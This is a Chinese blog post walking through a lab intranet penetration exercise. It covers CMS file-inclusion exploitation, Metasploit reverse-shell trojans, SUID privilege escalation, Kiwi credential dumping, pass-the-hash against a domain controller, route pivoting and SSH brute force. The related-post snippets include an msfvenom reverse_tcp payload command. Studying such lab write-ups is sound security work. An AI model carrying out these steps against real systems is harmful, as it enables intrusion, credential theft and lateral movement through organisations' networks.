完整的内网渗透实验

已于 2023-11-29 08:49:37 修改
阅读量1.3k 收藏 17
点赞数 14
文章标签: 网络安全
于 2023-11-07 14:26:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/balalawb/article/details/134266539
版权

实验环境,kali主机IP:172.17.17.131,Web服务器IP:172.17.17.104。(无其他信息可知)

一、获取Web服务器权限

1、测试Web服务器连通性。

2、nmap扫描Web服务器开放端口。(获取到IP后,通常情况下会打开浏览器访问服务或进行端口扫描)

3、浏览器访问Web网站,分析识别网站cms,以及版本号。

4、网络查找cms漏洞。(进行信息搜集,记录相关漏洞信息。一般会重点关注SQL注入、代码执行、文件包含等,之后进行测试)

5、经源码分析,该网站存在文件包含漏洞。

开始漏洞利用

6、打开msf,启用php反弹shell监听。

7、通过信息搜集,网站cms存在后台地址。

8、登录管理后台(搜索引擎可知后台默认用户名admin,密码admin)。

9、msf生成木马。

10、在管理后台添加频道上传文件,发现文件不符合要求。

11、修改木马后缀名。

12、添加频道重新上传文件,进行文件包含漏洞(信息搜集,如无相关信息,需进行代码审计,找到漏洞,并在本地进行复现,之后将复现成果移植到实际攻防中)

将生成的文件名,在频道模型使用文件包含漏洞

13、退出后台,并进入前台,可以在导航栏看到上传的文件,点击访问页面。

14、kali获得meterpreter。

15、查看是否可以利用SUID-find命令提权,不用上传脚本即可提权(之后进行提权,最简单的提权是内核提权)

16、find命令提权

17、读取敏感文件

18、进行密钥破解,后重新创建用户

19、查看root目录

二、获取内网Windows权限

1、ctrl+C退出meterperter

2、msf生成Windows攻击木马

3、修改木马名称(提高攻击成功率)

4、把木马放到网站根目录或网站前端能够调用的目录

kali启动http服务

重新获取Web服务器meterpreter

下载木马文件到web服务器根目录(由于url中文容易受到影响,因此直接复制粘贴kali http网址)

6、启动msf,开启Windows反弹shell监听

7、访问网站后台,通过友情链接的方式,将木马植入到网站中。友情链接可以通过两种url方式植入木马:网站外url和站内url

站外url

站内url(优先选择)

9、办公区域用户访问网站,下载木马程序

10、Windows用户运行木马文件,msf获得meterpreter,并查看系统信息和权限(通常情况会对木马文件进行免杀处理,木马隐藏,无文件操作)

11、对Windows系统进行UAC提权

12、查找域控(通过arp和dns确认域控IP)确定域控IP地址:192.168.80.102

13、进行端口转发,将Windows的所有流量转发到域控服务器中(隧道技术)(将本地的端口转发到域控服务器端口,怀疑域控服务器开放什么服务,做对应端口的转发。如果通过windows10,上传木马等操作容易被发现)

查看端口转发列表

14、远程连接服务器

首先尝试ssh远程连接服务器(确认DNS服务器是域控服务器还是linux搭建的服务器)

无法连接成功,因此猜测是Windows域控服务器,通过rdesktop远程连接

三、获取内网域控服务器权限

利用kiwi获取Windows10用户的NTLM

1、meterpreter进行进程迁移

2、加载kiwi,列出所有凭证

利用PTH哈希传递攻击拿到域控服务器权限

3、利用smb攻击模块,攻击域控服务器(RHOST、RPORT需要设置为kali主机IP和转发端口,域名通过windows10主机查询得出,LM设置为32个0)

4、通过域控服务器扫描内网其他机器

5、扫描其他网段(实际情况需要扫描整个网段)

四、获取内网DevOps服务器权限

通过添加路由的方法(由于portfwd在三层网络中使用不方便,因此采用添加路由的隧道技术)

1、获取当前机器所在的网段

2、添加目标内网的网段(删除指定的网段路由命令:run autoroute -d -s 192.168.100.0/24)

3、打印当前添加的路由表信息

通过添加路由的方式,可以实现多级代理。

多级代理下的隧道建立

4、将目标指定的内网网段路由添加到指定session上(为了确认操作,另外一种路由添加操作,删除路由命令:route remove 192.168.100.0 255.255.255.0 64)

打印路由信息

5、进行端口扫描,通过端口号可以判断生产主机开放了ssh服务

6、利用ssh爆破进行攻击(通常利用ssh账号爆破模块)

ssh账号爆破模块,需要制作字典

本次实验利用ssh登录模块(真实环境需要进行密码爆破),获取正确的ssh登录用户名和密码

7、登录生产主机

8、进行权限提升

首先查看内核版本

查看sudo版本

查看运维人员是否开启sudo免密登录(可以看出开启了sudo免密登录)

9、查找flag文件(实际渗透过程中,通过find查找一些配置文件或mysql服务等所在为止,或插入后门。穿透出来。连接VPS,以便后续的各种操作)

五、文件转移

1、进入根目录,查看目录

2、将文件转移到低权限用户文件中

3、查看系统是否存在python或python3

4、通过python3启动后端运行http

5、返回域控shell

6、通过poweshell将flag文件上传到域控服务器中(由于kali无法与生产服务器通信,因此需要经过域控服务器跳板机下载文件)

进入C盘根目录,查看根目录(方便查找文件)

将flag文件下载到域控服务器C盘根目录

7、返回meterpreter,从域控服务器(跳板机)下载flag文件到本地

查看本地flag文件

使用vscode更改编码打开flag文件

balalawb
关注
内网渗透实战技巧
谢公子的博客
09-28 1万+
目录 拿下Web服务器 phpmyadmin后台getshell 后渗透第一步 派生CobaltStrike权限 获得System权限 获取账号密码 远程桌面登录 添加路由、挂Socks4a代理 域信息收集 内网主机信息收集 内网存活主机探测 内网存活主机端口扫描 内网存活主机服务探测 内网横向渗透攻击技巧 MS17-010 CVE-2019-0708 pse...
内网渗透--CS伪造黄金票据与白银票据
Armandhe的博客
06-24 3800
性感作者,在线翻车
kali渗透内网和外网
xnxqwzy的博客
08-22 960
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
web安全攻防渗透测试实战指南_web安全攻防渗透测试实战指南,零基础入门到精通,收藏这一篇就够了
最新发布
2401_84618514的博客
09-27 1435
1. Nmap的基本Nmap + ip 6+ ipNmap -A 开启操作系统识别和版本识别功能– T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现-v 显示信息的级别,-vv显示更详细的信息192.168.1.1/24 扫描C段 192.168.11 -254 =上nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) 位置 : nmap安装目录/scripts/ 例如/usr/share/nmap/scripts脚本类型:ll /usr/sh
渗透实战:内网域渗透
热门推荐
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 5213
内网渗透-实战|手把手教你如何进行内网渗透
一次内网渗透测试实验过程
D的博客
05-31 2461
渗透测试过程 目标网站ip:192.168.31.196 测试过程 浏览网站通过手工测试发现http://jy.test.com/hr/hr.php?hrid=15处有注入点 尝试利用sqlmap工具跑一下这个注入点,看能不能注出有用的信息 通过测试我们发现这个注入点果然可以进行注入 然后我们利用该注入点进行尝试注出网站后台登录账号密码 我们发现我们跑出来的网站后台密码是用md5加密的,所以我们...
简单的内网渗透实验
weixin_30732825的博客
06-12 333
本机win10  192.168.1.109 虚拟机win7  NAT模式  192.168.1.131 攻击机:虚拟机kali  仅主机模式  192.168.10.128 假设攻击机kali已经对win10主机getshell 1.kali生成一个exe木马文件test.exe(这是最简单的木马文件,有杀软就会被杀,若要免杀还要做免杀处理) msfvenom -p window...
内网渗透-信息收集之本机收集(命令、工具及脚本)
nilwiaoglwigjwlg的博客
09-25 6403
后渗透攻防: https://www.secpulse.com/archives/51527.html https://3gstudent.github.io/ 目录 一、内网信息收集 1 1.内网基础信息: 1 2.内网核心业务信息: 1 3.其他信息 2 二、内网实战(命令、工具及脚本) 2 1.用户列表、当前权限等 2 2.内网网络拓扑等信息 2 3.进程列表 3 4.端口信息 3 5.补丁...
六、内网渗透测试——(4)CSRF以及靶场作业
weixin_45540609的博客
04-27 779
CSRF 1、原理 csrf:跨站请求伪造,通过伪装来自受信任用户的请求来利用受信任的网站。浏览器在用户不知情的情况下发送数据包。 成因:网站cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问该网站,都会默认已登录状态。在这期间,攻击者发送了构造好的csrf脚本或包含csrf的链接,可能会执行一些用户不想做的功能。 ​ csrf需要适当的诱骗,因为csrf的代码是针对单一网站的。 exp:攻击脚本 poc:验证脚本 2、快速利用CSRF 用Burp抓包,.
渗透测试的实施流程:明确目标、信息收集、漏洞发现、漏洞验证、后渗透测试等
08-19
在这个阶段,渗透测试小组在客户允许的范围内进行内网渗透,权限维持、权限提升、读取用户hash、浏览器密码等。 6. 痕迹清除 在这个阶段,渗透测试小组清除中间数据,清理掉上传的webshell后门,删除上传、下载的...
渗透测试完整流程
m0_57751431的博客
08-03 579
目录 前言 渗透测试与入侵的最大区别 常规渗透测试流程 一、明确目标 二、信息收集 三、漏洞探测 方法 内容 四、漏洞验证 五、信息分析 六、获取所需 七、信息整理 八、形成报告 流程总结 前言 WEB安全渗透测试不是随便拿个工具扫一下就可以做的, 要了解业务还需要给出解决方案。 渗透测试与入侵的最大区别 渗透测试:出于保护系统的目的,更全面地找出测试对象的安全隐患。 入侵:不择手段地(甚至是具有破坏性的)拿到系统权限。 常规渗透测试流程 明确目标>信息收集&
渗透测试实验一 网络扫描与网络侦察
qq_50798384的博客
11-06 1097
一. 用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 二、照片中的女生在哪里旅行?截图搜索到的地址信息 1.首先,再搜索引擎中输入图片中的关键信息cafe brasserie letrentehuit 2.找到店的门牌号为38 avenue de Suffren,75015 Paris, ,France,发现这家店位于巴黎 3.在谷歌地球中输入门牌号,即得到街景信息 4.在百度地图中输入门牌号38 avenue d
MSF内网渗透实战
hackzkaq的博客
05-17 3982
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1989
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
渗透测试综合实验(迂回渗透,入侵企业内网并将其控制为僵尸网络)
yyj1781572的博客
04-06 1858
内网渗透测试
内网渗透】记一次靶机实战
kali_Ma的博客
11-24 1675
靶机难度属于中等靶机水平,全文思路就是信息收集,使用nmap或者masscan进行端口扫描,访问web页面,发现提示,接着使用wfuzz进行指定路径fuzz。然后找到py脚本,接着进行脚本分析,发现脚本存在的漏洞。构造poc然后进行反弹shell,反弹shell之后,发现存在另一个新的脚本,存在密码加密方式和密码本。进行解密,解密之后使用ssh进行远程登录。使用sudo -l发现xx路径下的python脚本拥有root权限,接着进行移动该目录写入提权语法成功提权。
黑客内网渗透技术解析
"内网渗透常用手法" 内网渗透是黑客攻击的一种策略,通常发生在攻击者已经突破了外层防御并进入内部网络之后。在安全措施日益增强的今天,外网渗透变得越来越困难,因此内网渗透成为黑客寻找敏感信息和控制目标系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值